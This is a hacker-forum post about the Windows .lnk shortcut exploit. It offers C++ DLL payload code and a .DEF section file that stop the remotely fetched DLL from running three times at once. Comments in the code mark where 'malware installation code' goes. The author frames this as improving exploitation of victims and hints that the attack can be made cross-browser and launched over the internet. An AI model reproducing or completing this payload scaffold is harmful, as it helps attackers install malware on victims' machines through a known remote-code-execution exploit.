• Windows Link exploit (shortcut file) race condition tackling--"vinnu"

    Team : Legion Of Xtremers / Garage4Hackers
    author : "vinnu"
    Greetz : Prashant Uniyal, b0nd, D4rk457, and Secfence team.
    Exploit path : http://www.exploit-db.com/exploits/14403/
    Exploit by : Ivanlef0u


    Windows Link exploit (shortcut file) race condition tackling

    The .lnk exploit retrieves a DLL from remote machine and execute it while the icon
    for the shortcut (.lnk file) is resolved.

    The race condition:
    The .lnk exploitation suffers from a race condition as it executes the downloaded dll 3 times
    simultaneously. This hinders the proper exploitation of the victim in case the payload dll
    tries to write any file on the disk or tries to access and change any other resource on the victim
    system.
    First thing to be noted that the .lnk exploit is actually an undocumented DLL-Injection
    technique.
    The .lnk file will retrieve a file of type either .dll, .cpl or .ocx or extension which are
    legitimate dynamic libraries with DllMain() defined.

    The race condition need to be resolved in this retrieved DLL.
    In this example, we are going to download and execute the x.dll.
    The example sample DLL code is (suppose 'x' is the project name):

    /* ------------x.cpp--------------------*/
    #include <iostream>
    #include <shellapi.h>

    #pragma data_seg(".xdat") // Shared memory section to tackle race condition
    bool xcheck = false;
    #pragma data_seg()

    void x() {
    // The exploit worked, now install malware
    // Place all mallware installation code here.
    // The code to access the resources
    // like file creation etc...
    }
    void in() { // This routine will handle the race condition
    if (xcheck == false) { // If false then set it true and access the resources
    xcheck = true;x(); // otherwise just exit the routine.
    }
    }
    BOOL APIENTRY DllMain( HANDLE hModule,
    DWORD ul_reason_for_call,
    LPVOID lpReserved
    )
    {
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
    in();break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
    break;
    }
    return TRUE;
    }
    /*----------end of file-----------------*/

    Also a x.DEF file is needed and must be added to the project workspace.
    This file will define the custom memory sections attributes:

    SECTIONS
    .xdat READ WRITE SHARED

    There exists more ways to tackle race condition like the use of mutexes, semaphores etc.
    The same exploit can aslo be made cross browser and can also be launched via internet.

    But try a little it urself. I'll tell u later...."vinnu"

    [Study the exploit to know more the above discussion. The link has been provided above.]
    This article was originally published in blog: Windows Link exploit (shortcut file) race condition tackling--"vinnu" started by prashant_uniyal
  • G4H Facebook

  • G4H Twitter